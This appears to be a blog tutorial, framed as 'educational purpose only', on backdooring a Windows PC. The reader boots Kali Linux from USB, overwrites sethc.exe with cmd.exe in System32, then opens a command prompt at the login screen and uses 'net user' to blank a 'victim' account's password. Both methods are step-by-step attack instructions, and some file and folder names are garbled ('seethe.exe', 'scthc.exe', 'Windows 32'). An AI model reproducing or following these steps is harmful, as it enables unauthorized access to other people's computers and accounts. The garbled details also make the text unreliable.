How To Create Backdoor Using Kali Linux






What is backdoor? 

To say it simply just like in house using another entrance to come in
In the same way we will create a backdoor and hack into any systems easily

Requirements:
1)     4Gb Pendrive or Higher

2)     Kali Linux Operating System è  Click Here To Download Kali Linux
3)     1 & 2 Combined Kali Live USB

Kali Linux is the best option to create a backdoor because it enables Live Boot through which we can use it on my victim pc easily by carrying it and also 4gb Pendrive is enough
Here I will explain how to Create a backdoor using Kali Linux

If You Are Interested to Create a backdoor using Backtrack Here it is Mostly Both Are Same But Check It Out




Method I



Step 1: Open terminal and type the following command (after typing every code press enter)
Ø  cd /media 
Ø  ls
Step 2:  Then your hard disk code will be shown (for ex: 28EC168..)
            Every hard-disk have their own code
NOTE:   If you are not able to find the code, repeat the process again or click on places (which you can find above terminal icon) then in places click one "filesystem" a window will open there you can see the hard-disk code as a title in blue
Follow my Commands again (after typing every command press enter)
Ø  cd /media/(hard disk code name without brackets)
Ø  ls 
 (Actually This “ls” will show you the list of folders and files present in the above mentioned source or location)
Ø  cd /media/ hard disk code name /Windows 
Ø  cd /media/ hard disk code name /Windows/System32 
Ø  ls
Ø  cp cmd.exe sethc.exe
Here now what we did is changed seethe.exe to cmd.exe, now you can exit the terminal and reboot your system and open windows.
When login screen appears and asks for password press “Shift Key” 5 Times Continuously
Command Prompt will open
Then type the following commands in it
Net user (name of account or system)     Example::  net user Bhanu 
And click enter 2 times – it will ask to enter a new password leave it blank
Reboot system again and now the system starts without asking for login password
This is how creating a backdoor Helps in hacking systems easily
This works on Kali Linux as well as Backtrack


Method II


Here is the second way of creating a Backdoor in Backtrack this is much more simple compared to previous process

Ø Start your Kali Linux using Live USB
Ø  Got to places and you can see your drives there open it
Ø One is system reserved, do not touch it, open Your Local disk C
Ø In Local Disk: C you will find a folder named “Windows”
Ø And in that Open  “Windows 32” and search for “Cmd.exe”
Ø And rename it to “scthc.exe”
Ø That’s it the process is done
Now shutdown Kali Linux and Start Windows
Now windows asks for Login Password
Now Press “Shift Key” 5 Times continuously
Command Prompt will open
There type Net user (your pc name)
                                      Ex: net user Bhanu
Now press enter two times, when it asks to enter password leave it black and restart the system, your victim pc opens without asking for password
That’s it a simple trick.

THIS IS FOR EDUCATIONAL PURPOSE ONLY, I AM NOT RESPONSIBLE FOR ANY 
ILLEGAL ACTIVITIES DONE BY VISITORS, THIS IS FOR ETHICAL PURPOSE ONLY

0 comments:

Post a Comment